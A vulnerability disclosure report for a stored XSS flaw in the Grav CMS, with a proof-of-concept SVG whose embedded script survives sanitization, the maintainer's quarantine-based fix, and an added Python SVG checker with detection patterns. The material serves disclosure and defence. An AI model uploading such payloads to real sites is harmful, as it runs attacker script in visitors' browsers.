Cross-site Scripting (XSS) - Stored in getgrav/grav

Valid

Reported on

Jul 1st 2021


✍️ Description

Grav is vulnerable to stored XSS via malformed SVG files. It is possible to upload an SVG file whose XML contains errors after the script tags, so the embedded script is not stripped on upload.

🕵️‍♂️ Proof of Concept

SVG file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
   <error>
</svg>

  1. Create an SVG file with the above content.
  2. Upload it through profile image update.
  3. Open the target URL.

PoC video.

💥 Impact

This vulnerability allows JavaScript execution (stored XSS) in the browser of anyone who opens the uploaded SVG.

Renan Rocha submitted a
a year ago
Z-Old
a year ago

Admin


Hey Renan, how's it going my friend? I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the getgrav/grav team and are waiting to hear back a year ago
Renan Rocha
a year ago

Researcher


Hey Ziding, thank you !

getgrav/grav maintainer validated this vulnerability a year ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
getgrav/grav maintainer
a year ago

Maintainer


Thank you for this, Renan. We went with a slightly different patch: instead of emptying the file, we move it into a quarantine folder. It is a less drastic approach and gives the admins the opportunity to review the files. Sometimes SVG sanitization might fail even if the file is not malicious.

You can check out the commit here https://github.com/getgrav/grav/commit/8af1229f6518c496d0c49aa1c9ff3e31b110ac7a

Thanks! Djamil
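As an added example (not Grav's code and not from the report or the linked commit), the following Python sketches the defensive logic that the report's failure mode and the maintainer's reply point to: parse the uploaded SVG strictly, treat a parse failure as "unknown" rather than "nothing to sanitize", and move anything that is not clean into a quarantine directory for admin review instead of publishing it. The reported SVG is taken from the proof of concept above; the clean sample, the repaired sample, the directory layout and all function names are assumptions made for this illustration.

```python
import re
import shutil
import xml.etree.ElementTree as ET
from enum import Enum
from pathlib import Path

# Sample inputs for this example.
# REPORTED_SVG is the file from the proof of concept above: a <script> element
# followed by an unclosed <error> element, so the XML is not well-formed.
REPORTED_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
   <error>
</svg>
"""
# Constructed: the same content with the XML repaired; well-formed, still carries a script.
WELLFORMED_SCRIPT_SVG = REPORTED_SVG.replace(b"<error>", b"<error/>")
# Constructed: a benign SVG, well-formed and without active content.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255)"/>
</svg>
"""


class Verdict(Enum):
    CLEAN = "clean"              # well-formed, no active content found
    DANGEROUS = "dangerous"      # well-formed, active content found
    UNPARSEABLE = "unparseable"  # not well-formed: the checker cannot reason about it


# Element and attribute patterns that carry executable content in an SVG.
# This is a detection sketch, not a complete allow-list sanitizer.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.IGNORECASE)
SCRIPT_URL = re.compile(r"^\s*javascript\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip an XML namespace prefix such as '{http://www.w3.org/2000/svg}'."""
    return name.rsplit("}", 1)[-1]


def inspect_svg(data: bytes):
    """Return (Verdict, findings). A file the parser rejects is reported as
    UNPARSEABLE, never silently treated as having nothing to sanitize."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return Verdict.UNPARSEABLE, [f"not well-formed XML: {exc}"]
    findings = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag.lower() in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            attr_name = _local(attr)
            if EVENT_HANDLER.match(attr_name):
                findings.append(f"event handler attribute {attr_name} on <{tag}>")
            elif SCRIPT_URL.match(value):
                findings.append(f"script URL in {attr_name} on <{tag}>")
    return (Verdict.DANGEROUS if findings else Verdict.CLEAN), findings


def decide(data: bytes) -> str:
    """Only a clean, well-formed file is published; everything else is held
    for admin review, the quarantine approach the maintainer describes."""
    verdict, _ = inspect_svg(data)
    return "publish" if verdict is Verdict.CLEAN else "quarantine"


def store_upload(data: bytes, filename: str, public_dir: Path, quarantine_dir: Path) -> Path:
    """Write the upload into the public or the quarantine directory (assumed layout)."""
    target_dir = public_dir if decide(data) == "publish" else quarantine_dir
    target_dir.mkdir(parents=True, exist_ok=True)
    target = target_dir / Path(filename).name  # drop any path components from the client-supplied name
    target.write_bytes(data)
    return target


if __name__ == "__main__":
    import tempfile
    base = Path(tempfile.mkdtemp())
    samples = (("clean.svg", CLEAN_SVG), ("reported.svg", REPORTED_SVG), ("repaired.svg", WELLFORMED_SCRIPT_SVG))
    for name, blob in samples:
        verdict, findings = inspect_svg(blob)
        dest = store_upload(blob, name, base / "images", base / "quarantine")
        print(f"{name}: {verdict.value} {findings} -> {dest.relative_to(base)}")
    shutil.rmtree(base)
```

The reported file lands in quarantine because the parser rejects it, not because a script was spotted: a checker that only acts on what it could parse would have let the same file through. The repaired variant is caught by the element check, and only the benign file is published.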

Z-Old
a year ago

Admin


Thank you Djamil. Great job all round!

Djamil Legato confirmed that a fix has been merged on 8af122 5 months ago
Djamil Legato has been awarded the fix bounty
Security.php#L59 has been validated